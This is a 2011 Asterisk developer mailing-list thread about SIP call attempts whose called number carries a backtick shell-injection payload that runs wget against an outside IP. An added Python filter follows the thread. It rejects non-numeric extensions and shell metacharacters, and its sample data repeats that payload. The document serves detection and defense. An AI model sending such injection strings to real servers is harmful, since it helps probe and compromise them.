[asterisk-dev] A new kind of SIP attack ?

Tom Browning ttbrowning at gmail.com
Mon Sep 12 08:03:15 CDT 2011


On Mon, Sep 12, 2011 at 4:47 AM, Olle E. Johansson <oej at edvina.net> wrote:
>
> 12 sep 2011 kl. 10:39 skrev Pavel Troller:
>
>> Hi!
>>  Since yesterday, I can see strange "call attempts" coming to my
>> switches over SIP to destinations like this:
>>  00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`
>>  I tried to wget the file manually and it was successful, but it was
>> empty (zero size).
>>  I'm just informing about something which may be a new kind of hacking
>> attempt. I hope that Asterisk doesn't perform backtick expansion during
>> processing of the called number, but I'm writing it there to be sure
>> that a developer's eye will look at this and confirm it.
>>  With regards,
>>    Pavel Troller
>>
>
> Just wanted to add that the best current practise we added to the README files earlier applies here as well. If your dialplan ONLY has numeric extensions, filter out all the rest on incoming calls.
>
> /O


I saw (and reported on asterisk-users) the same URI attempts last
night on a server configured to be a "honeypot" of sorts (Asterisk 10
that accepts all calls via UDP 5060 and dumps them into a single
Asterisk 10 conference bridge :-) ... works great)

FWIW, the call attempts must be coming from a real SIP server as I
found two of the calls sitting in my conference bridge!

I would bet that this shell injection scan has its roots in a
discovery that a common SIP server configuration or framework is
subject to shell injection and this is how they are going to find those
servers for further attack via shell injection.

Tom
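As an illustration of the filtering Olle recommends (numeric extensions only) applied to the kind of called number Pavel saw, here is an added example; it is not code from this thread or from Asterisk, the `pbx.example` host and the request lines are constructed, and the numeric policy (optional leading '+', 3 to 15 digits) is an assumption.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Policy from the thread: if the dialplan only has numeric extensions, accept
# only a plain number (optional leading '+', 3 to 15 digits) as the called party.
NUMERIC_USER = re.compile(r"^\+?[0-9]{3,15}$")
# Characters that serve no purpose in a called number and only matter if the
# sender hopes the user part is handed to a shell somewhere downstream.
SHELL_META = re.compile(r"[`$|;&<>\\]")

def request_uri_user(request_line: str) -> Optional[str]:
    """Return the user part of 'INVITE sip:user@host SIP/2.0', or None."""
    m = re.match(r"^INVITE\s+sips?:([^@;>\s]+)@", request_line)
    if not m:
        return None
    # Percent-decode first so that %60 (a backtick) cannot slip past the checks.
    return unquote(m.group(1))

def classify(request_line: str) -> str:
    """Decide whether an INVITE's called number is acceptable under the policy."""
    user = request_uri_user(request_line)
    if user is None:
        return "reject:malformed"
    if NUMERIC_USER.fullmatch(user):
        return "accept"
    if SHELL_META.search(user):
        return "reject:shell-metachar"   # the pattern Pavel reported lands here
    return "reject:non-numeric"

def summarize(request_lines: List[str]) -> Dict[str, int]:
    """Count verdicts over a batch of request lines (e.g. from a SIP trace)."""
    counts: Dict[str, int] = {}
    for line in request_lines:
        verdict = classify(line)
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts

# Constructed sample request lines; the second mirrors the user part quoted in the thread.
SAMPLE_REQUESTS = [
    "INVITE sip:+14155550100@pbx.example SIP/2.0",
    "INVITE sip:00123456789000`wget\\x20-O\\x20/dev/null\\x20http://91.223.89.94/V.php`@pbx.example SIP/2.0",
    "INVITE sip:0012345%60true%60@pbx.example SIP/2.0",
    "INVITE sip:admin@pbx.example SIP/2.0",
    "OPTIONS sip:pbx.example SIP/2.0",
]
if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(f"{classify(line):24} {line}")
```

The percent-decoding step matters: a logging-only view of the raw Request-URI would show `%60` rather than a backtick, so any filter should normalise before matching.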


